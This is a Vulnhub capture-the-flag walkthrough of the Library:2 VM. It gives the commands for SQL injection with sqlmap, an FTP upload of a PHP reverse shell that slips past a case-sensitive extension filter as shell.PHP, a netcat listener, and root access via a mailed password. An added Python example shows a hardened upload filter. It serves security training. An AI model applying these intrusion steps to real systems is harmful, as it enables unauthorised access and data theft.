The Library:2 Vulnhub Walkthrough

densmukkedk

Today we are going to take on another challenge, Library2, which is the second lab of the Library series. The credit for making this VM goes to “Avraham Cohen”. It is a boot2root challenge where we have to root the server to complete the challenge. You can download this VM here.

Security Level: Beginner

Penetrating Methodology:

Scanning

  • Netdiscover
  • NMAP

Enumeration

  • Web Directory Search
  • Burpsuite

Exploitation

  • Sqlmap
  • FTP
  • Shell Upload
  • Netcat

Privilege Escalation

  • Obtaining root password

Walkthrough:

Scanning:

Let’s start off with the scanning process. This target VM took the IP address of 192.168.1.107 automatically from our local Wi-Fi network.

We used Nmap for port scanning and found that ports 21 and 80 are open.

Code:
nmap -A 192.168.1.107

Enumeration:

Since port 80 is open, we opened the IP address in our browser, but we didn’t find anything useful on the webpage.

First, we tried dirb in default mode but didn’t find any directory. Then we searched with the .php extension and got one result: /library.php

Code:
dirb http://192.168.1.107 -X .php

After accessing the URL http://192.168.1.107/library.php we got a webpage listing the names of a few countries.

We just clicked on Netherlands and it didn’t give any information.

We captured the request in Burp Suite and suspected that the country parameter might be vulnerable to SQL injection. We copied the raw request from Burp into a text file named sql and used an asterisk (*) to mark the injection point, but we didn’t get anything.

Then we took a little help from the hint given by the creator of this machine on Vulnhub and changed the request from GET to POST.

The request has now been changed from GET to POST. Copy this request into a text file on your attacking machine.

Exploitation:

Now let’s run sqlmap against the text file into which we copied the POST request.

Code:
sqlmap -r sql --dbs --batch --risk 3 --level 5

From the results, we found a database named library.

Next, we enumerated the library database further for usernames and passwords.

Code:
sqlmap -r sql -D library --dump-all --batch --risk 3 --level 5

We found a username globus and password AroundTheWorld for the ftp service.

We connected to the target system over FTP using the credentials found above. We looked around but couldn’t find anything useful, so we grabbed the php-reverse-shell from /usr/share/webshells/php, changed the listener IP to ours and named it shell.php.

Then we tried to upload it to the target machine using the put command, but we got an access denied error.

Code:
ftp 192.168.1.107
ls
cd html
ls
put shell.php

It seemed there was some sort of file format filtering happening in the backend. We found a workaround for this filter by changing the name of the script file from shell.php to shell.PHP.

Code:
put shell.PHP
ls
chmod 777 shell.PHP
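
The result above (shell.php refused, shell.PHP accepted) is what a case-sensitive extension denylist produces. The following is an added example, not code from the VM or from the original walkthrough: it contrasts a hypothetical case-sensitive filter with an allowlist applied to the case-folded name, and audits a constructed directory listing for names the weak filter would have let through. The function names, extension sets and file names are assumptions.

```python
import fnmatch
import posixpath

# Assumed values for illustration; the page does not show the server's filter.
SCRIPT_EXTENSIONS = ("php", "phtml", "phar")
ALLOWED_EXTENSIONS = {".txt", ".html", ".css", ".png", ".jpg"}

# Constructed sample listing of an upload directory.
SAMPLE_LISTING = ["index.html", "shell.php", "shell.PHP", "notes.TXT",
                  "logo.png", "backup.pHtMl", "image.php.jpg"]


def naive_filter_allows(filename):
    """Case-sensitive denylist, consistent with the behaviour seen above."""
    return not any(fnmatch.fnmatchcase(filename, "*." + ext)
                   for ext in SCRIPT_EXTENSIONS)


def hardened_filter_allows(filename):
    """Allowlist applied to the case-folded base name."""
    base = posixpath.basename(filename.replace("\\", "/")).casefold()
    stem, ext = posixpath.splitext(base)
    if not stem or ext not in ALLOWED_EXTENSIONS:
        return False
    # Reject names such as image.php.jpg that carry a script extension
    # anywhere after the first dot.
    return not any(part in SCRIPT_EXTENSIONS for part in base.split(".")[1:])


def audit(listing):
    """Names the naive filter accepted but the hardened policy rejects."""
    return [name for name in listing
            if naive_filter_allows(name) and not hardened_filter_allows(name)]


if __name__ == "__main__":
    for name in SAMPLE_LISTING:
        print(f"{name:15} naive={naive_filter_allows(name)!s:5} "
              f"hardened={hardened_filter_allows(name)}")
    print("review:", audit(SAMPLE_LISTING))
```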

Now we executed the shell by just browsing to the URL http://192.168.1.107/shell.PHP and at the same time started a netcat listener on our Kali machine.

Privilege Escalation:

We successfully got the netcat session with limited user privileges. After a little bit of directory traversing, we found the root password inside a file named welcome located in the /var/mail directory.

Then we finally switched to the root shell using the su command and successfully completed the challenge.

Code:
nc -lvp 1234
python -c 'import pty; pty.spawn("/bin/sh")'
cd /var/mail
ls
cat welcome
su root
id

Author: Auqib Wani is a Certified Ethical Hacker, Penetration Tester and a Tech Enthusiast with more than 5 years of experience in the field of Network & Cyber Security. Contact Here
 
